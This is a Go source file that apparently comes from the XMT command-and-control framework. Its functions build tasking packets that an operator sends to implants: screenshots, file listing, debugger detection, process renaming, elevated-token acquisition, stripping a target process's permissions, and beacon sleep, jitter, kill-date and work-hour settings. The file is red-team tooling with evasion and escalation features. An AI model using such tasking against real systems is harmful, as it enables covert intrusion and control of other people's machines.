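// Source listing: github.com/iDigitalFlame/xmt@v0.5.4/c2/task/v_task.go

//go:build !implant
// +build !implant

// Copyright (C) 2020 - 2023 iDigitalFlame
//
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program.  If not, see <https://www.gnu.org/licenses/>.
//

// Reviewer overview: every function in this file only builds a request Packet
// and returns it. Nothing here performs the described action itself. The build
// constraint above excludes this file from builds that set the 'implant' tag.
//
// Several builders share the MvTime ID and are told apart by the leading
// selector value documented on each of them: 0 for sleep/jitter (Duration,
// Sleep, Jitter), 1 for the kill date (KillDate) and 2 for work hours
// (WorkHours).

package task

import (
	"time"

	"github.com/iDigitalFlame/xmt/cmd/filter"
	"github.com/iDigitalFlame/xmt/com"
)

// Pwd returns a print current directory Packet. This can be used to instruct
// the client to return a string value that contains the current working
// directory.
//
// C2 Details:
//
//	ID: MvPwd
//
//	Input:
//	    <none>
//	Output:
//	    string // Working Dir
func Pwd() *com.Packet {
	return &com.Packet{ID: MvPwd}
}

// Mounts returns a list mounted drives Packet. This can be used to instruct
// the client to return a string list of all the mount points on the host device.
//
// C2 Details:
//
//	ID: MvMounts
//
//	Input:
//	    <none>
//	Output:
//	    []string // Mount Paths List
func Mounts() *com.Packet {
	return &com.Packet{ID: MvMounts}
}

// Refresh returns a refresh Packet. This will instruct the client to re-update
// its internal Device storage and return the new result. This can be used to
// detect new network interfaces added/removed and changes to hostname/user
// status.
//
// This is NOT needed after a Migration, as this happens automatically.
//
// C2 Details:
//
//	ID: MvRefresh
//
//	Input:
//	    <none>
//	Output:
//	    Machine // Updated device details
func Refresh() *com.Packet {
	return &com.Packet{ID: MvRefresh}
}

// ScreenShot returns a screenshot Packet. This will instruct the client to
// attempt to get a screenshot of all the current active desktops on the host.
// If successful, the returned data is a binary blob of the resulting image,
// encoded in the PNG image format.
//
// Always returns 'ErrNoWindows' on non-Windows devices.
//
// C2 Details:
//
//	ID: TvScreenShot
//
//	Input:
//	    <none>
//	Output:
//	    []byte // Data
func ScreenShot() *com.Packet {
	return &com.Packet{ID: TvScreenShot}
}

// Ls returns a file list Packet. This can be used to instruct the client
// to return a string and bool list of the files in the directory specified.
//
// If 'd' is empty, the current working directory "." is used.
//
// The source path may contain environment variables that will be resolved
// during runtime.
//
// C2 Details:
//
//	ID: MvList
//
//	Input:
//	    string          // Directory
//	Output:
//	    uint32          // Count
//	    []File struct { // List of Files
//	        string      // Name
//	        int32       // Mode
//	        uint64      // Size
//	        int64       // Modtime
//	    }
func Ls(d string) *com.Packet {
	n := &com.Packet{ID: MvList}
	n.WriteString(d)
	return n
}

// IsDebugged returns a check debugger status Packet. This can be used to instruct
// the client to return a boolean value indicating whether it is currently
// attached to or being run by a debugger.
//
// C2 Details:
//
//	ID: MvCheckDebug
//
//	Input:
//	    <none>
//	Output:
//	    bool // True if being debugged, false otherwise
func IsDebugged() *com.Packet {
	return &com.Packet{ID: MvCheckDebug}
}

// Jitter returns a set Session jitter Packet. This can be used to instruct the
// client to update its jitter value to the specified 0-100 percentage.
//
// Anything greater than 100 will be capped to 100 and anything less than zero
// (except -1) will be set to zero. Values of -1 are ignored. This setting will
// NOT override the Sleep setting.
//
// C2 Details:
//
//	ID: MvTime
//
//	Input:
//	    uint8       // Always 0 for this Task
//	    int8        // Jitter
//	    uint64      // Always 0 for this Task
//	Output:
//	    uint8       // Jitter
//	    uint64      // Sleep
//	    uint64      // Kill Date
//	    WorkHours { // Work Hours
//	        uint8   // Day
//	        uint8   // Start Hour
//	        uint8   // Start Min
//	        uint8   // End Hour
//	        uint8   // End Min
//	    }
func Jitter(j int) *com.Packet {
	// A zero duration leaves the Sleep value untouched (see Duration).
	return Duration(0, j)
}

// Cwd returns a change directory Packet. This can be used to instruct the
// client to change from its current working directory to the directory
// specified.
//
// Empty or invalid directory entries will return an error.
//
// The source path may contain environment variables that will be resolved
// during runtime.
//
// C2 Details:
//
//	ID: MvCwd
//
//	Input:
//	    string // Directory
//	Output:
//	    <none>
func Cwd(d string) *com.Packet {
	n := &com.Packet{ID: MvCwd}
	n.WriteString(d)
	return n
}

// Profile returns an update profile Packet. This can be used to instruct the
// client to set its profile to the raw Profile bytes supplied.
//
// IT IS RECOMMENDED TO USE THE 'Session.SetProfile' CALL INSTEAD TO PREVENT DE-SYNC
// ISSUES BETWEEN SERVER AND CLIENT. HERE ONLY FOR USAGE IN SCRIPTS.
//
// C2 Details:
//
//	ID: MvProfile
//
//	Input:
//	    []byte // Profile
//	Output:
//	    <none>
func Profile(b []byte) *com.Packet {
	n := &com.Packet{ID: MvProfile}
	n.WriteBytes(b)
	return n
}

// KillDate returns a set Session kill date Packet. This can be used to instruct
// the client to update its kill date to the specified date value.
//
// If the time supplied is the empty time struct, this will clear any Kill Date
// if it exists.
//
// C2 Details:
//
//	ID: MvTime
//
//	Input:
//	    uint8       // Always 1 for this Task
//	    uint64      // Unix time
//	Output:
//	    uint8       // Jitter
//	    uint64      // Sleep
//	    uint64      // Kill Date
//	    WorkHours { // Work Hours
//	        uint8   // Day
//	        uint8   // Start Hour
//	        uint8   // Start Min
//	        uint8   // End Hour
//	        uint8   // End Min
//	    }
func KillDate(t time.Time) *com.Packet {
	n := &com.Packet{ID: MvTime}
	// Selector 1 marks this MvTime packet as a kill date update.
	n.WriteUint8(1)
	if t.IsZero() {
		// A zero timestamp is the "clear the kill date" signal.
		n.WriteUint64(0)
		return n
	}
	n.WriteInt64(t.Unix())
	return n
}

// ProcessName returns a process name change Packet. This can be used to instruct
// the client to change from its current in-memory name to the specified string.
//
// C2 Details:
//
//	ID: TvRename
//
//	Input:
//	    string // New Process Name
//	Output:
//	    <none>
func ProcessName(s string) *com.Packet {
	n := &com.Packet{ID: TvRename}
	n.WriteString(s)
	return n
}

// Wait returns a wait -n- sleep Packet. This can be used to instruct the
// client to pause processing for the specified duration.
//
// This Task only has an effect during Scripts as most operations are threaded.
//
// If the time is less than or equal to zero, the task will become a NOP.
//
// C2 Details:
//
//	ID: TvWait
//
//	Input:
//	    uint64 // Wait duration
//	Output:
//	    <none>
func Wait(d time.Duration) *com.Packet {
	n := &com.Packet{ID: TvWait}
	// NOTE(review): a negative duration becomes a very large unsigned value
	// under this conversion. The NOP behaviour documented above presumably
	// relies on the receiver reading the field back as signed - confirm.
	n.WriteUint64(uint64(d))
	return n
}

// Sleep returns a set Session sleep Packet. This can be used to instruct the
// client to update its sleep value to the specified duration.
//
// Anything less than or equal to zero is ignored! This setting will NOT override
// the Jitter setting.
//
// C2 Details:
//
//	ID: MvTime
//
//	Input:
//	    uint8       // Always 0 for this Task
//	    int8        // Always -1 for this Task
//	    uint64      // Sleep
//	Output:
//	    uint8       // Jitter
//	    uint64      // Sleep
//	    uint64      // Kill Date
//	    WorkHours { // Work Hours
//	        uint8   // Day
//	        uint8   // Start Hour
//	        uint8   // Start Min
//	        uint8   // End Hour
//	        uint8   // End Min
//	    }
func Sleep(d time.Duration) *com.Packet {
	// A jitter of -1 leaves the Jitter value untouched (see Duration).
	return Duration(d, -1)
}

// UnTrust returns an Untrust Packet. This will instruct the client to use the
// provided Filter to attempt to "Untrust" the targeted process by removing all
// of its permissions and setting its integrity level to "Untrusted".
//
// Always returns 'ErrNoWindows' on non-Windows devices.
//
// C2 Details:
//
//	ID: TvUnTrust
//
//	Input:
//	    Filter struct { // Filter
//	        bool        // Filter Status
//	        uint32      // PID
//	        bool        // Fallback
//	        uint8       // Session
//	        uint8       // Elevated
//	        []string    // Exclude
//	        []string    // Include
//	    }
//	Output:
//	    <none>
func UnTrust(f *filter.Filter) *com.Packet {
	n := &com.Packet{ID: TvUnTrust}
	f.MarshalStream(n)
	return n
}

// Elevate returns an elevate Packet. This will instruct the client to use the
// provided Filter to attempt to get a Token handle to an elevated process. If
// the Filter is nil, then the client will attempt at any elevated process.
//
// Always returns 'ErrNoWindows' on non-Windows devices.
//
// C2 Details:
//
//	ID: TvElevate
//
//	Input:
//	    Filter struct { // Filter
//	        bool        // Filter Status
//	        uint32      // PID
//	        bool        // Fallback
//	        uint8       // Session
//	        uint8       // Elevated
//	        []string    // Exclude
//	        []string    // Include
//	    }
//	Output:
//	    <none>
func Elevate(f *filter.Filter) *com.Packet {
	n := &com.Packet{ID: TvElevate}
	// NOTE(review): a nil Filter is documented as valid, so this call relies
	// on MarshalStream accepting a nil receiver - confirm in package filter.
	f.MarshalStream(n)
	return n
}

// Duration returns a set Session sleep and/or jitter Packet. This can be used
// to instruct the client to update its sleep and jitter values to the specified
// duration and 0-100 percentage values if they are not unset. (-1 for Jitter,
// anything <=0 for Sleep).
//
// For Sleep, anything less than or equal to zero is ignored!
//
// For Jitter, anything greater than 100 will be capped to 100 and anything less
// than zero (except -1) will be set to zero. Values of -1 are ignored.
//
// The jitter value is normalised to that range here, before it is narrowed to
// a single byte. Without this, values outside the int8 range would wrap: 200
// would be sent as a negative number and 255 as -1 ("ignored") instead of
// being capped to 100.
//
// C2 Details:
//
//	ID: MvTime
//
//	Input:
//	    uint8       // Always 0 for this Task
//	    int8        // Jitter
//	    uint64      // Sleep
//	Output:
//	    uint8       // Jitter
//	    uint64      // Sleep
//	    uint64      // Kill Date
//	    WorkHours { // Work Hours
//	        uint8   // Day
//	        uint8   // Start Hour
//	        uint8   // Start Min
//	        uint8   // End Hour
//	        uint8   // End Min
//	    }
func Duration(d time.Duration, j int) *com.Packet {
	// Apply the documented contract before truncating so that out-of-range
	// inputs cannot alias a different in-range value (or the -1 sentinel).
	switch {
	case j > 100:
		j = 100
	case j < -1:
		j = 0
	}
	n := &com.Packet{ID: MvTime}
	// One 16-bit write carries both leading fields: the high byte is the
	// selector (0) and the low byte holds the jitter's 8-bit pattern.
	n.WriteUint16(uint16(j & 0xFF))
	n.WriteInt64(int64(d))
	return n
}

// WorkHours returns a set Session Work Hours Packet. This can be used to instruct
// the client to update its working hours to the supplied work hours values as
// uint8 values.
//
// Days is a bitmask of the days that the WorkHours applies to. The bit values are
// 0 (Sunday) to 7 (Saturday). Values 0, 255 and anything over 126 are treated
// as all days selected.
//
// NOTE(review): "0 to 7" names eight bit positions for seven days; confirm the
// intended range against the receiving side.
//
// If all the supplied values are zero, this will clear any previous Work Hours
// set.
//
// C2 Details:
//
//	ID: MvTime
//
//	Input:
//	    uint8       // Always 2 for this Task
//	    uint8       // Day
//	    uint8       // Start Hour
//	    uint8       // Start Min
//	    uint8       // End Hour
//	    uint8       // End Min
//	Output:
//	    uint8       // Jitter
//	    uint64      // Sleep
//	    uint64      // Kill Date
//	    WorkHours { // Work Hours
//	        uint8   // Day
//	        uint8   // Start Hour
//	        uint8   // Start Min
//	        uint8   // End Hour
//	        uint8   // End Min
//	    }
func WorkHours(day, startHour, startMin, endHour, endMin uint8) *com.Packet {
	n := &com.Packet{ID: MvTime}
	// One 16-bit write carries both leading fields: the high byte is the
	// selector (2) and the low byte is the day bitmask.
	n.WriteUint16(0x200 | uint16(day))
	n.WriteUint8(startHour)
	n.WriteUint8(startMin)
	n.WriteUint8(endHour)
	n.WriteUint8(endMin)
	return n
}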